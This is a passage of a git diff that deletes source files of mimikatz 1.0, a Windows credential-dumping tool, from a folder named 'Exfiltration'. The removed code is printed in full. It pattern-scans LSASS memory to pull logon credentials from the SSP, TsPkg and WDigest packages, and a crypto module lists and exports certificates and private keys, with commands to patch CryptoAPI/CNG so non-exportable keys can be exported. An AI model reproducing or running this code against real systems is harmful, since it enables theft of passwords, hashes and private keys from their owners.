wstring(L"ssp"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_ssp::searchSSPEntryList() -{ -#ifdef _M_X64 - BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; - LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3; - BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15}; - LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3; -#elif defined _M_IX86 - BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; - LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1; -#endif - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModMSV && !SspCredentialList) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - pointeur= reinterpret_cast<PBYTE *>(&SspCredentialList); - -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_SspCredentialList; - taille = sizeof(PTRN_WIN5_SspCredentialList); - offset = OFFS_WIN5_SspCredentialList; - } - else - { - pattern = PTRN_WIN6_SspCredentialList; - taille = sizeof(PTRN_WIN6_SspCredentialList); - offset = OFFS_WIN6_SspCredentialList; - } -#elif defined _M_IX86 - pattern = PTRN_WALL_SspCredentialList; - taille = sizeof(PTRN_WALL_SspCredentialList); - offset = OFFS_WALL_SspCredentialList; -#endif - if(HMODULE monModule = LoadLibrary(L"msv1_0")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"msv1_0", pattern, taille, offset); - *pointeur += pModMSV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (SspCredentialList != NULL); -} - -bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchSSPEntryList()) - { - KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials; - DWORD monNb = 0; - if(mod_memory::readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) - { - while(mesCredentials.Flink != SspCredentialList) - { - if(mod_memory::readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) - { - if(RtlEqualLuid(logId, &(mesCredentials.LogonId))) - { - mod_mimikatz_sekurlsa::genericCredsToStream(&mesCredentials.credentials, justSecurity, true, &monNb); - monNb++; - } - } - } - } - } - else (*outputStream) << L"n.a. (SSP KO)"; - - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h deleted file mode 100644 index d2d5396..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h +++ /dev/null @@ -1,32 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_ssp { - -private: - typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY { - struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink; - struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink; - ULONG References; - ULONG CredentialReferences; - LUID LogonId; - ULONG unk0; - ULONG unk1; - ULONG unk2; - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY; - - static PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList; - static bool searchSSPEntryList(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModMSV; - static bool getSSP(vector<wstring> * arguments); - static bool WINAPI getSSPLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp deleted file mode 100644 index 71e3751..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp +++ /dev/null @@ -1,94 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "tspkg.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_tspkg::pModTSPKG = NULL; -PRTL_AVL_TABLE mod_mimikatz_sekurlsa_tspkg::TSGlobalCredTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL); - -bool mod_mimikatz_sekurlsa_tspkg::getTsPkg(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getTsPkgLogonData, wstring(L"tspkg"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_tspkg::searchTSPKGFuncs() -{ -#ifdef _M_X64 - BYTE PTRN_WALL_TSGlobalCredTable[] = {0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d}; - LONG OFFS_WALL_TSGlobalCredTable = sizeof(PTRN_WALL_TSGlobalCredTable); -#elif defined _M_IX86 - BYTE PTRN_WNO8_TSGlobalCredTable[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe}; - LONG OFFS_WNO8_TSGlobalCredTable = sizeof(PTRN_WNO8_TSGlobalCredTable); - - BYTE PTRN_WIN8_TSGlobalCredTable[] = {0x8b, 0xff, 0x53, 0xbb}; - LONG OFFS_WIN8_TSGlobalCredTable = sizeof(PTRN_WIN8_TSGlobalCredTable); -#endif - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModTSPKG && !TSGlobalCredTable) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - - pointeur= reinterpret_cast<PBYTE *>(&TSGlobalCredTable); -#ifdef _M_X64 - pattern = PTRN_WALL_TSGlobalCredTable; - taille = sizeof(PTRN_WALL_TSGlobalCredTable); - offset = OFFS_WALL_TSGlobalCredTable; -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern = PTRN_WNO8_TSGlobalCredTable; - taille = sizeof(PTRN_WNO8_TSGlobalCredTable); - offset = OFFS_WNO8_TSGlobalCredTable; - } - else - { - pattern = PTRN_WIN8_TSGlobalCredTable; - taille = sizeof(PTRN_WIN8_TSGlobalCredTable); - offset = OFFS_WIN8_TSGlobalCredTable; - } -#endif - - if(HMODULE monModule = LoadLibrary(L"tspkg")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"tspkg", pattern, taille, offset); - *pointeur += pModTSPKG->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (pModTSPKG && TSGlobalCredTable); -} - -bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchTSPKGFuncs()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - BYTE * monBuffP = new BYTE[sizeof(KIWI_TS_CREDENTIAL)], * monBuffC = new BYTE[sizeof(KIWI_TS_PRIMARY_CREDENTIAL)]; - if(PKIWI_TS_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(TSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))) - { - if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_TS_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(monBuffP); - if(pLogSession->pTsPrimary) - { - if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) - mesCreds = &(reinterpret_cast<PKIWI_TS_PRIMARY_CREDENTIAL>(monBuffC)->credentials); - } - else (*outputStream) << L"n.s. (SuppCred KO) / "; - } - } - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); - delete [] monBuffC, monBuffP; - } - else (*outputStream) << L"n.a. (tspkg KO)"; - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h deleted file mode 100644 index 35a3b15..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h +++ /dev/null @@ -1,37 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_tspkg { - -private: - typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { - PVOID unk0; // lock ? - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; - - typedef struct _KIWI_TS_CREDENTIAL { - #ifdef _M_X64 - BYTE unk0[108]; - #elif defined _M_IX86 - BYTE unk0[64]; - #endif - LUID LocallyUniqueIdentifier; - PVOID unk1; - PVOID unk2; - PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; - } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; - - static PRTL_AVL_TABLE TSGlobalCredTable; - static bool searchTSPKGFuncs(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG; - static bool getTsPkg(vector<wstring> * arguments); - static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp deleted file mode 100644 index b6e3062..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp +++ /dev/null @@ -1,91 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "wdigest.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_wdigest::pModWDIGEST = NULL; -mod_mimikatz_sekurlsa_wdigest::PKIWI_WDIGEST_LIST_ENTRY mod_mimikatz_sekurlsa_wdigest::l_LogSessList = NULL; -long mod_mimikatz_sekurlsa_wdigest::offsetWDigestPrimary = 0; - -bool mod_mimikatz_sekurlsa_wdigest::getWDigest(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getWDigestLogonData, wstring(L"wdigest"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_wdigest::searchWDigestEntryList() -{ -#ifdef _M_X64 - BYTE PTRN_WNO8_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5b, 0x08, 0x48, 0x8d}; - BYTE PTRN_W8CP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x4b, 0x08, 0x49, 0x8b, 0x43, 0x08, 0x4c, 0x39}; - BYTE PTRN_W8RP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85}; -#elif defined _M_IX86 - BYTE PTRN_WNO8_InsertInLogSess[]= {0x8b, 0x45, 0x08, 0x89, 0x08, 0xc7, 0x40, 0x04}; - BYTE PTRN_W8CP_InsertInLogSess[]= {0x89, 0x0e, 0x89, 0x56, 0x04, 0x8b, 0x41, 0x04}; - BYTE PTRN_W8RP_InsertInLogSess[]= {0x89, 0x06, 0x89, 0x4e, 0x04, 0x39, 0x48, 0x04}; -#endif - LONG OFFS_WALL_InsertInLogSess = -4; - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModWDIGEST && !l_LogSessList) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - - pointeur= reinterpret_cast<PBYTE *>(&l_LogSessList); - offset = OFFS_WALL_InsertInLogSess; - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern = PTRN_WNO8_InsertInLogSess; - taille = sizeof(PTRN_WNO8_InsertInLogSess); - } - else if(mod_system::GLOB_Version.dwBuildNumber < 8400) - { - pattern = PTRN_W8CP_InsertInLogSess; - taille = sizeof(PTRN_W8CP_InsertInLogSess); - } - else - { - pattern = PTRN_W8RP_InsertInLogSess; - taille = sizeof(PTRN_W8RP_InsertInLogSess); - } - - if(HMODULE monModule = LoadLibrary(L"wdigest")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"wdigest", pattern, taille, offset, "SpInstanceInit", false); - *pointeur += pModWDIGEST->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - -#ifdef _M_X64 - offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 48) : 48); -#elif defined _M_IX86 - offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 28) : 32); -#endif - } - return (pModWDIGEST && l_LogSessList); -} - -bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchWDigestEntryList()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL); - BYTE * monBuff = new BYTE[taille]; - if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId)) - if( mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) - mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary); - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); - delete [] monBuff; - } - else (*outputStream) << L"n.a. (wdigest KO)"; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h deleted file mode 100644 index 9db3c8b..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h +++ /dev/null @@ -1,29 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_wdigest { - -private: - typedef struct _KIWI_WDIGEST_LIST_ENTRY { - struct _KIWI_WDIGEST_LIST_ENTRY *Flink; - struct _KIWI_WDIGEST_LIST_ENTRY *Blink; - DWORD UsageCount; - struct _KIWI_WDIGEST_LIST_ENTRY *This; - LUID LocallyUniqueIdentifier; - } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; - - static PKIWI_WDIGEST_LIST_ENTRY l_LogSessList; - static long offsetWDigestPrimary; - static bool searchWDigestEntryList(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModWDIGEST; - static bool getWDigest(vector<wstring> * arguments); - static bool WINAPI getWDigestLogonData(__in PLUID logId, __in bool justSecurity); -};
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.cpp deleted file mode 100644 index a869cd8..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.cpp +++ /dev/null @@ -1,594 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_crypto.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_crypto::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listProviders, L"listProviders", L"Liste les providers installs)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listStores, L"listStores", L"Liste les magasins systme")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listCertificates, L"listCertificates", L"Liste les certificats")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(listKeys, L"listKeys", L"Liste les conteneurs de cls")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(exportCertificates, L"exportCertificates", L"Exporte les certificats")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(exportKeys, L"exportKeys", L"Exporte les cls")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(patchcng, L"patchcng", L"[experimental] Patch le gestionnaire de cls pour l\'export de cls non exportable")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(patchcapi, L"patchcapi", L"[experimental] Patch la CryptoAPI courante pour l\'export de cls non exportable")); - return monVector; -} - -bool mod_mimikatz_crypto::listProviders(vector<wstring> * arguments) -{ - vector<wstring> * monVectorProviders = new vector<wstring>(); - /* CryptoAPI */ - (*outputStream) << L"Providers CryptoAPI :" << endl; - if(mod_cryptoapi::getVectorProviders(monVectorProviders)) - for(vector<wstring>::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++) - (*outputStream) << L'\t' << *monProvider << endl; - else (*outputStream) << L"mod_cryptoapi::getVectorProviders : " << mod_system::getWinError() << endl; - - /* CryptoNG */ - if(mod_cryptong::isNcrypt) - { - (*outputStream) << endl; - monVectorProviders->clear(); - - (*outputStream) << L"Providers CNG :" << endl; - if(mod_cryptong::getVectorProviders(monVectorProviders)) - for(vector<wstring>::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++) - (*outputStream) << L'\t' << *monProvider << endl; - else (*outputStream) << L"mod_cryptong::getVectorProviders : " << mod_system::getWinError() << endl; - } - delete monVectorProviders; - return true; -} - -bool mod_mimikatz_crypto::listKeys(vector<wstring> * arguments) -{ - listAndOrExportKeys(arguments, false); - return true; -} - -bool mod_mimikatz_crypto::exportKeys(vector<wstring> * arguments) -{ - listAndOrExportKeys(arguments, true); - return true; -} - -bool mod_mimikatz_crypto::listStores(vector<wstring> * arguments) -{ - wstring monEmplacement = (arguments->empty() ? L"CERT_SYSTEM_STORE_CURRENT_USER" : arguments->front()); - - (*outputStream) << L"Emplacement : \'" << monEmplacement << L'\''; - - DWORD systemStore; - if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore)) - { - (*outputStream) << endl; - vector<wstring> * mesStores = new vector<wstring>(); - if(mod_crypto::getVectorSystemStores(mesStores, systemStore)) - for(vector<wstring>::iterator monStore = mesStores->begin(); monStore != mesStores->end(); monStore++) - (*outputStream) << L'\t' << *monStore << endl; - else (*outputStream) << L"mod_crypto::getListSystemStores : " << mod_system::getWinError() << endl; - delete mesStores; - } - else (*outputStream) << L" introuvable !" << endl; - return true; -} - -bool mod_mimikatz_crypto::listCertificates(vector<wstring> * arguments) -{ - listAndOrExportCertificates(arguments, false); - return true; -} - -bool mod_mimikatz_crypto::exportCertificates(vector<wstring> * arguments) -{ - listAndOrExportCertificates(arguments, true); - return true; -} - -void mod_mimikatz_crypto::listAndOrExportKeys(vector<wstring> * arguments, bool exportKeys) -{ - bool isMachine = false; - DWORD providerType = PROV_RSA_FULL; - wstring provider = MS_ENHANCED_PROV; - - switch (arguments->size()) - { - case 1: - isMachine = true; - case 0: - break; - case 3: - isMachine = true; - arguments->erase(arguments->begin()); - case 2: - mod_cryptoapi::getProviderString(arguments->front(), &provider); - mod_cryptoapi::getProviderTypeFromString(arguments->back(), &providerType); - break; - default : - (*outputStream) << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl; - return; - } - - - wstring type = (isMachine ? L"machine" : L"user"); - - vector<wstring> * monVectorKeys = new vector<wstring>(); - - /* CryptoAPI */ - (*outputStream) << L"[" << type << L"] Cls CryptoAPI :" << endl; - if(mod_cryptoapi::getVectorContainers(monVectorKeys, isMachine)) - { - DWORD i; - vector<wstring>::iterator monContainer; - for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++) - { - (*outputStream) << L"\t - " << *monContainer << endl; - - HCRYPTPROV hCryptKeyProv = NULL; - if(CryptAcquireContext(&hCryptKeyProv, monContainer->c_str(), provider.c_str(), providerType, NULL | (isMachine ? CRYPT_MACHINE_KEYSET : NULL))) - { - HCRYPTKEY maCle = NULL; - for(DWORD ks = AT_KEYEXCHANGE; (ks <= AT_SIGNATURE) && !maCle; ks++) - { - if(CryptGetUserKey(hCryptKeyProv, ks, &maCle)) - { - (*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl; - DWORD param = 0, taille = sizeof(param); - if(CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast<BYTE *>(¶m), &taille, NULL)) - (*outputStream) << L"\t\tExportabilit : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl; - if(CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(¶m), &taille, NULL)) - (*outputStream) << L"\t\tTaille cl : " << param << endl; - - if(exportKeys) - { - bool reussite = false; - BYTE * monExport = NULL; - DWORD tailleExport = 0; - - wstringstream monBuff; - wstring containerName = *monContainer; - sanitizeFileName(&containerName); - - monBuff << L"capi_" << type << L'_' << i << L'_' << containerName << L".pvk"; - - if(mod_cryptoapi::getPrivateKey(maCle, &monExport, &tailleExport)) - { - reussite = mod_crypto::PrivateKeyBlobToPVK(monExport, tailleExport, monBuff.str(), ks); - delete[] monExport; - } - - (*outputStream) << L"\t\tExport priv dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; - } - } - } - } - - if(maCle) - CryptDestroyKey(maCle); - else - (*outputStream) << L"\t\t* Erreur de cl ; " << mod_system::getWinError() << endl; - - - CryptReleaseContext(hCryptKeyProv, 0); - } - else (*outputStream) << L"\t\t* Erreur d\'acquisition de la cl ; " << mod_system::getWinError() << endl; - } - } - else (*outputStream) << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl; - - /* CryptoNG */ - if(mod_cryptong::isNcrypt) - { - (*outputStream) << endl; - monVectorKeys->clear(); - - (*outputStream) << L"[" << type << L"] Cls CNG :" << endl; - if(mod_cryptong::getVectorContainers(monVectorKeys, isMachine)) - { - DWORD i; - vector<wstring>::iterator monContainer; - for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++) - { - (*outputStream) << L"\t - " << *monContainer << endl; - - NCRYPT_KEY_HANDLE maCle; - if(mod_cryptong::getHKeyFromName(*monContainer, &maCle, isMachine)) - { - bool exportable = false; - DWORD size = 0; - - if(mod_cryptong::isKeyExportable(&maCle, &exportable)) - (*outputStream) << L"\t\tExportabilit : " << (exportable ? L"OUI" : L"NON") << endl; - if(mod_cryptong::getKeySize(&maCle, &size)) - (*outputStream) << L"\t\tTaille cl : " << size << endl; - - if(exportKeys) - { - bool reussite = false; - BYTE * monExport = NULL; - DWORD tailleExport = 0; - - wstringstream monBuff; - monBuff << L"cng_" << type << L'_' << i << L'_' << *monContainer << L".pvk"; - - if(mod_cryptong::getPrivateKey(maCle, &monExport, &tailleExport)) - { - reussite = mod_crypto::PrivateKeyBlobToPVK(monExport, tailleExport, monBuff.str()); - delete[] monExport; - } - - (*outputStream) << L"\t\tExport priv dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; - if(!reussite) - { - (*outputStream) << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; - } - } - mod_cryptong::NCryptFreeObject(maCle); - } - } - } - else (*outputStream) << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl; - } - - delete monVectorKeys; -} - - -void mod_mimikatz_crypto::listAndOrExportCertificates(vector<wstring> * arguments, bool exportCert) -{ - wstring monEmplacement = L"CERT_SYSTEM_STORE_CURRENT_USER"; - wstring monStore = L"My"; - - if(arguments->size() == 1) - { - monEmplacement = arguments->front(); - } - else if(arguments->size() == 2) - { - monEmplacement = arguments->front(); - monStore = arguments->back(); - } - - (*outputStream) << L"Emplacement : \'" << monEmplacement << L'\''; - - DWORD systemStore; - if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore)) - { - (*outputStream) << L"\\" << monStore << endl; - if(HCERTSTORE hCertificateStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, NULL, NULL, systemStore | CERT_STORE_OPEN_EXISTING_FLAG | CERT_STORE_READONLY_FLAG, monStore.c_str())) - { - DWORD i; - PCCERT_CONTEXT pCertContext; - for (i = 0, pCertContext = CertEnumCertificatesInStore(hCertificateStore, NULL); pCertContext != NULL; pCertContext = CertEnumCertificatesInStore(hCertificateStore, pCertContext), i++) - { - wstring * certName = new wstring(); - bool reussite = false; - - if(!mod_crypto::getCertNameFromCertCTX(pCertContext, certName)) - certName->assign(L"[empty]"); - - (*outputStream) << L"\t - " << *certName << endl;; - sanitizeFileName(certName); - - wstringstream monBuff; - monBuff << monEmplacement << L'_' << monStore << L'_' << i << L'_' << *certName << L'.'; - - mod_crypto::KIWI_KEY_PROV_INFO keyProvInfo; - if(mod_crypto::getKiwiKeyProvInfo(pCertContext, &keyProvInfo)) - { - (*outputStream) << L"\t\tContainer Cl : " << keyProvInfo.pwszContainerName << endl; - (*outputStream) << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl; - - HCRYPTPROV_OR_NCRYPT_KEY_HANDLE monProv = NULL; - DWORD keySpec = 0; - BOOL aFermer = false; - - if(CryptAcquireCertificatePrivateKey(pCertContext, CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG /* CRYPT_ACQUIRE_SILENT_FLAG NULL */, NULL, &monProv, &keySpec, &aFermer)) - { - (*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl; - - DWORD size = 0; - bool exportable = false; - - if(keySpec == CERT_NCRYPT_KEY_SPEC) - { - if(mod_cryptong::isNcrypt) - { - reussite = mod_cryptong::getKeySize(&monProv, &size); - reussite &=mod_cryptong::isKeyExportable(&monProv, &exportable); - - if(aFermer) - { - mod_cryptong::NCryptFreeObject(monProv); - } - } - else (*outputStream) << L"\t\t\tErreur : Cl de type nCrypt, sans nCrypt ?" << endl; - } - else - { - DWORD tailleEcrite = 0; - DWORD exportability; - - HCRYPTKEY maCle = NULL; - if(reussite = (CryptGetUserKey(monProv, keySpec, &maCle) != 0)) - { - tailleEcrite = sizeof(DWORD); - reussite = (CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast<BYTE *>(&size), &tailleEcrite, NULL) != 0); - tailleEcrite = 